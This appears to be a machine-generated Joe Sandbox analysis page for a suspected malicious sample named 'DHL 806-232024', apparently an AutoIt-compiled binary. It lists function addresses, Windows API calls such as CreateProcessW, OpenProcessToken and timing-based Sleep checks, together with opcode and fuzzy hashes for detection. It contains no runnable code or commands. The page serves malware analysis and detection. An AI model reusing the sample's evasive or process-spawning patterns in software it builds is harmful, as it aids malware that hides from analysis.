Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fea8a1854e2d8bffbf4a70f2a3e442a6c83ed85ee264c993baaa1ca59713fb83
Instruction ID: a695fa15c3964655df57dec3570881cfdc6276c726d0f0a77854c6dad6234b17
Opcode Fuzzy Hash: fea8a1854e2d8bffbf4a70f2a3e442a6c83ed85ee264c993baaa1ca59713fb83
Instruction Fuzzy Hash: 8A115E79941218FFEB10DFA5CC84F9DBBB8FB48710F2040A5EA04B7254D6716E10DB90

Function 008D1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

DefDlgProcW.USER32(?,00000020,?), ref: 008D12D8
GetClientRect.USER32(?,?), ref: 0090B84B
GetCursorPos.USER32(?), ref: 0090B855
ScreenToClient.USER32(?,?), ref: 0090B860

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 579b2f6ddd071662e310177520dda3e94cfd9b366226bbc135a2744625d5a047
Instruction ID: 03d24d2a1ccc9487e5ff16f126f3de375634f2ccc9c22ae906c3bd9ebc9b51ff
Opcode Fuzzy Hash: 579b2f6ddd071662e310177520dda3e94cfd9b366226bbc135a2744625d5a047
Instruction Fuzzy Hash: C0115535A10119BFCF00EFA9D8899BE77B9FF05311F000556F901E3250D731AA519BA6

Function 00931652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 0093166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 00931694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 0093169E
Sleep.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 009316D1

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a86d2c8d712de97ce443eb2cbf8354a17357d9009e61c8a985123a9c83dae9d5
Instruction ID: 0a8249b35282ba83904329bff9db0212b1c894d5442070127d2666fbae45815c
Opcode Fuzzy Hash: a86d2c8d712de97ce443eb2cbf8354a17357d9009e61c8a985123a9c83dae9d5
Instruction Fuzzy Hash: 4B118E31C19A1DDBCF00AFE6D85AAEEBB78FF09716F044055E940B2250CB3055609FD6

Function 00907207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0090722B

Part of subcall function 00907912: __fltout2.LIBCMT ref: 0090793B

__cftog_l.LIBCMT ref: 00907251
__cftoe_l.LIBCMT ref: 00907283

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 50feec98bb02685a66ee99191c3714038b3b2e333de5373225d2bacb1f164c80
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 5001403684414EBFCF525FC8CC018EE7F66BF59361B588515FA2898071D237E9B1AB81

Function 0095B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0095B59E
ScreenToClient.USER32(?,?), ref: 0095B5B6
ScreenToClient.USER32(?,?), ref: 0095B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0095B5F5

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: d699e4bef185bfb73447fbc1799b5ccf32507646214166304f749e0f740a8098
Instruction ID: 45db50ad3ecf49609e8eeb2f93bf6b93c9a0177b6e350097ff796e382a47d646
Opcode Fuzzy Hash: d699e4bef185bfb73447fbc1799b5ccf32507646214166304f749e0f740a8098
Instruction Fuzzy Hash: A91143B9D0520DEFDB41CFA9C8849EEFBB9FB08311F108166E914E3220D735AA559F90

Function 0095B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0095B8FE
_memset.LIBCMT ref: 0095B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00997F20,00997F64), ref: 0095B93C
CloseHandle.KERNEL32 ref: 0095B94E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: fe0cf9e19f27710dba5f2ffccae03677ba3d6db99ee6ffcda8473b32dae80e09
Instruction ID: 58e3c4c0585d91f5852d6419ebf3f165516767347c61c2482da2c82a212693b5
Opcode Fuzzy Hash: fe0cf9e19f27710dba5f2ffccae03677ba3d6db99ee6ffcda8473b32dae80e09
Instruction Fuzzy Hash: 07F054B25683047BF61027B9AC05F7BBA9CEB09355F000022BB08F51A1DB71490097B9

Function 00936E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00936E88

Part of subcall function 0093794E: _memset.LIBCMT ref: 00937983

_memmove.LIBCMT ref: 00936EAB
_memset.LIBCMT ref: 00936EB8
LeaveCriticalSection.KERNEL32(?), ref: 00936EC8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 57e41c5e726ba1d3e1f9600a050de37cf1740896fc2ed57213395a360d6ebe5f
Instruction ID: 7b443750da0e5bb8b4840ca9a520a7b103ba4976f4337b7caa1e78eb3eaba952
Opcode Fuzzy Hash: 57e41c5e726ba1d3e1f9600a050de37cf1740896fc2ed57213395a360d6ebe5f
Instruction Fuzzy Hash: A5F0547A104204ABCF016F55EC85B5ABB2AEF85331F048061FE089E216CB31E911DBB5

Function 0095C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 008D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D135C
Part of subcall function 008D12F3: BeginPath.GDI32(?), ref: 008D1373
Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095C030
LineTo.GDI32(00000000,?,?), ref: 0095C03D
EndPath.GDI32(00000000), ref: 0095C04D
StrokePath.GDI32(00000000), ref: 0095C05B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: e58f6793d579b1a73c9c6a321423bc340464137b5d29a13cb080c55b5b79be95
Instruction ID: 4ba7b46bc202bbc4ca189d3107df04a7f388fbf9e3dfd7cfaf6c2c80c294844d
Opcode Fuzzy Hash: e58f6793d579b1a73c9c6a321423bc340464137b5d29a13cb080c55b5b79be95
Instruction Fuzzy Hash: 7FF05E32019359BBDB126F66AC0DFCE3F99AF05322F084041FA11610E287765655EB95

Function 0092A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0092A3AC
GetCurrentThreadId.KERNEL32 ref: 0092A3B3
AttachThreadInput.USER32(00000000), ref: 0092A3BA

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: e1632420bde5400da70a55caee6e4cec00feafaaf5cca2b0203d0856f1a593f0
Instruction ID: e030ebeaa1d8e0d8fe0f96d38a1bccfa9038d48f72998930b422d6f6651f8ef3
Opcode Fuzzy Hash: e1632420bde5400da70a55caee6e4cec00feafaaf5cca2b0203d0856f1a593f0
Instruction Fuzzy Hash: A3E0C93254A338BBDB205BA2EC1DED77F5CEF167B2F008025F50995061C6758540EBA1

Function 008D2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008D2231
SetTextColor.GDI32(?,000000FF), ref: 008D223B
SetBkMode.GDI32(?,00000001), ref: 008D2250
GetStockObject.GDI32(00000005), ref: 008D2258
GetWindowDC.USER32(?,00000000), ref: 0090C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0090C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0090C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0090C112
GetPixel.GDI32(00000000,?,?), ref: 0090C132
ReleaseDC.USER32(?,00000000), ref: 0090C13D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 3d13aad587642c60d34225dbb1164a027fcc18088846611f08c157310b3cddf9
Instruction ID: bb8df2bcfcfe8eacbd397610e7cafb7482f6f4a3abeace38bc7e96c3b08200ee
Opcode Fuzzy Hash: 3d13aad587642c60d34225dbb1164a027fcc18088846611f08c157310b3cddf9
Instruction Fuzzy Hash: 7EE06D32118644EEDF215F75FC0DBE87B24EB15337F008366FAA9880E187714980EB11

Function 00928C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00928C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0092882E), ref: 00928C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0092882E), ref: 00928C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0092882E), ref: 00928C7E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3b285bfec36db69dc6259576304a74f0e2e998115b5503db8568a10d7c62b68e
Instruction ID: 2149930eb374ee11bcc46ade4f8fdef31c842e63e0847fc13e1ee9b1321c0d1e
Opcode Fuzzy Hash: 3b285bfec36db69dc6259576304a74f0e2e998115b5503db8568a10d7c62b68e
Instruction Fuzzy Hash: C2E04F766563219BD7205FB26D0CB573BACAF507A3F084828E285DA080DA3484469B61

Function 00912187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00912187
GetDC.USER32(00000000), ref: 00912191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009121B1
ReleaseDC.USER32(?), ref: 009121D2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 53a6db4ab56a91d51f71ec3871b1af0890a87277f33c41dcb96ddb4702d06f44
Instruction ID: b5dd09ccb19f8fcf9419e4143687c996df38310b0de1e38845d125809d5bdb3f
Opcode Fuzzy Hash: 53a6db4ab56a91d51f71ec3871b1af0890a87277f33c41dcb96ddb4702d06f44
Instruction Fuzzy Hash: EAE0E575815218EFDF019F65C818A9D7BB1FB4C362F108426F95AD7260DB388141AF40

Function 0091219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0091219B
GetDC.USER32(00000000), ref: 009121A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009121B1
ReleaseDC.USER32(?), ref: 009121D2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f9cc9678b2b2b8c5de61d517dcd0ef41cad7e502ef2ebbad9e35816c17e89dc6
Instruction ID: d263022b694de0612c51030fae312d5fdbf13dc65630a9f6cd20f2335961c0ec
Opcode Fuzzy Hash: f9cc9678b2b2b8c5de61d517dcd0ef41cad7e502ef2ebbad9e35816c17e89dc6
Instruction Fuzzy Hash: CAE0E575815218AFCF019F75C81869D7BA1FB4C322F108025F95AD7260DB389141AF40

Function 0092B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0092B981

Strings

Container, xrefs: 0092B8FE
AutoIt3GUI, xrefs: 0092B8F9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: f40634d59a5a48ff18e865f7fad6951578010b0ce3e28be462ba3fbabab3f58c
Instruction ID: d4ede75b38e32853593a7d578d5830362cbc4d79ccbc7d06588ae1176134e5c5
Opcode Fuzzy Hash: f40634d59a5a48ff18e865f7fad6951578010b0ce3e28be462ba3fbabab3f58c
Instruction Fuzzy Hash: 88914874600611AFDB24DF28D884B6ABBE8FF48710F24856EF94ACB395DB70E840CB50

Function 0093B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

__wcsnicmp.LIBCMT ref: 0093B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0093B361

Strings

LPT, xrefs: 0093B292

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 5ce80ca2a02dffdf98c78f2ac3c15712cba12a4cfdc90dca8ab212799c208d99
Instruction ID: a18586d81db84e23d65d9573d0c84a2583e6d3ddf2fdea25287252dbbeb2c337
Opcode Fuzzy Hash: 5ce80ca2a02dffdf98c78f2ac3c15712cba12a4cfdc90dca8ab212799c208d99
Instruction Fuzzy Hash: A5618075A00215AFCB14EF58C895EAEB7B8FF08310F11455AFA46AB351DB70AE40CF51

Function 008E2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 008E2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 008E2AE1

Strings

@, xrefs: 008E2AD5

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cde099e30fcd4881c979679fbb11e8cf1c3e9f1930335c71f2b7d1931099cebf
Instruction ID: d3deeebdd65cf07a098acdf2c68f0959c74e045e26f4d78fd8326464a69ab52e
Opcode Fuzzy Hash: cde099e30fcd4881c979679fbb11e8cf1c3e9f1930335c71f2b7d1931099cebf
Instruction Fuzzy Hash: 145149724187549BD320AF14DC86BAFBBE8FF84314F42895DF1D9911A1DB308969CB17

Function 009399BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 008D506B: __fread_nolock.LIBCMT ref: 008D5089

_wcscmp.LIBCMT ref: 00939AAE
_wcscmp.LIBCMT ref: 00939AC1

Strings

FILE, xrefs: 009399FA

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: d44468d34b05add16fd8f4abdb7c6f8c3f93d73d8df7f1f87dab173a80f86dca
Instruction ID: ef3ffbdadb66cd9429189ac044ac68dcb712c089fd61023f2410428a8b3daed5
Opcode Fuzzy Hash: d44468d34b05add16fd8f4abdb7c6f8c3f93d73d8df7f1f87dab173a80f86dca
Instruction Fuzzy Hash: BC41B971A00619BBDF209AA4DC45FEFBBBDEF45714F00047AF900E7281D6B59E048BA2

Function 00942882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00942892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009428C8

Strings

|, xrefs: 00942899

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 879a25ffc8cf4eac01803eb5b505f5b9f52579d8b699d7f00c4f59dca82d169c
Instruction ID: e2ffff8a16f45eeb488dce2a1e09f72ef8e3111f991670cf451c3825fc10de96
Opcode Fuzzy Hash: 879a25ffc8cf4eac01803eb5b505f5b9f52579d8b699d7f00c4f59dca82d169c
Instruction Fuzzy Hash: 82313D71810119AFCF01EFA5CC85EEEBFB9FF08350F10412AF815A6266EB315A56DB61

Function 00956CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00956D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00956DC2

Strings

static, xrefs: 00956D22

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

